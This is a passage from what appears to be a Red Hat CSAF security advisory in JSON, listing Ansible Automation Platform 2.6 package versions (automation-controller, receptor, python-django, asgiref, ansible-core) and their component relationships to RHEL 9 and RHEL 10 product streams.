"product_id": "automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-platform-ui@2.6.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"product_id": "automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.2.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"product_id": "automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base@1.2.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"product_id": "automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base-services@1.2.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"product_id": "automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-event-stream-services@1.2.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"product_id": "automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-worker-services@1.2.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.11.7-1.el9ap.noarch",
"product": {
"name": "automation-hub-0:4.11.7-1.el9ap.noarch",
"product_id": "automation-hub-0:4.11.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.11.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"product": {
"name": "ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"product_id": "ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-rulebook@1.2.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.7.10-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.7.10-2.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.7.10-2.el9ap.noarch",
"product_id": "automation-controller-server-0:4.7.10-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.7.10-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.7.10-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"product": {
"name": "automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"product_id": "automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.6.20260325-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"product": {
"name": "automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"product_id": "automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-config@2.6.20260325-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"product": {
"name": "automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"product_id": "automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-server@2.6.20260325-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"product": {
"name": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"product_id": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-automation-platform-installer@2.6-6.1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"product": {
"name": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"product_id": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.11.7-2.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"product": {
"name": "python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"product_id": "python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulp-container@2.19.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-2:2.16.17-2.el10ap.noarch",
"product": {
"name": "ansible-core-2:2.16.17-2.el10ap.noarch",
"product_id": "ansible-core-2:2.16.17-2.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.16.17-2.el10ap?arch=noarch\u0026epoch=2"
}
}
},
{
"category": "product_version",
"name": "python3-asgiref-0:3.11.1-2.el10ap.noarch",
"product": {
"name": "python3-asgiref-0:3.11.1-2.el10ap.noarch",
"product_id": "python3-asgiref-0:3.11.1-2.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-asgiref@3.11.1-2.el10ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-django-0:5.2.12-2.el10ap.noarch",
"product": {
"name": "python3-django-0:5.2.12-2.el10ap.noarch",
"product_id": "python3-django-0:5.2.12-2.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-django@5.2.12-2.el10ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "receptorctl-0:1.6.4-2.el10ap.noarch",
"product": {
"name": "receptorctl-0:1.6.4-2.el10ap.noarch",
"product_id": "receptorctl-0:1.6.4-2.el10ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptorctl@1.6.4-2.el10ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-2:2.16.17-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch"
},
"product_reference": "ansible-core-2:2.16.17-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-2:2.16.17-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src"
},
"product_reference": "ansible-core-2:2.16.17-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-asgiref-0:3.11.1-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src"
},
"product_reference": "python-asgiref-0:3.11.1-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-django-0:5.2.12-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src"
},
"product_reference": "python-django-0:5.2.12-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-asgiref-0:3.11.1-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch"
},
"product_reference": "python3-asgiref-0:3.11.1-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-django-0:5.2.12-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch"
},
"product_reference": "python3-django-0:5.2.12-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-2:2.16.17-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch"
},
"product_reference": "ansible-core-2:2.16.17-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-2:2.16.17-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src"
},
"product_reference": "ansible-core-2:2.16.17-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-asgiref-0:3.11.1-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src"
},
"product_reference": "python-asgiref-0:3.11.1-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-django-0:5.2.12-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src"
},
"product_reference": "python-django-0:5.2.12-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-asgiref-0:3.11.1-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch"
},
"product_reference": "python3-asgiref-0:3.11.1-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-django-0:5.2.12-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch"
},
"product_reference": "python3-django-0:5.2.12-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-2.el10ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64"
},
"product_reference": "receptor-0:1.6.4-2.el10ap.aarch64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-2.el10ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le"
},
"product_reference": "receptor-0:1.6.4-2.el10ap.ppc64le",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-2.el10ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x"
},
"product_reference": "receptor-0:1.6.4-2.el10ap.s390x",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-2.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src"
},
"product_reference": "receptor-0:1.6.4-2.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-2.el10ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64"
},
"product_reference": "receptor-0:1.6.4-2.el10ap.x86_64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-2.el10ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.4-2.el10ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.4-2.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch"
},
"product_reference": "receptorctl-0:1.6.4-2.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.16.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.16.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.16.17-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.16.17-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.16.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.16.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.10-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.7.10-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.7.10-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.7.10-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.7.10-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.7.10-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch"
},
"product_reference": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src"
},
"product_reference": "python3.12-asgiref-0:3.11.1-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-0:5.2.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch"
},
"product_reference": "python3.12-django-0:5.2.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-0:5.2.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src"
},
"product_reference": "python3.12-django-0:5.2.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64"
},
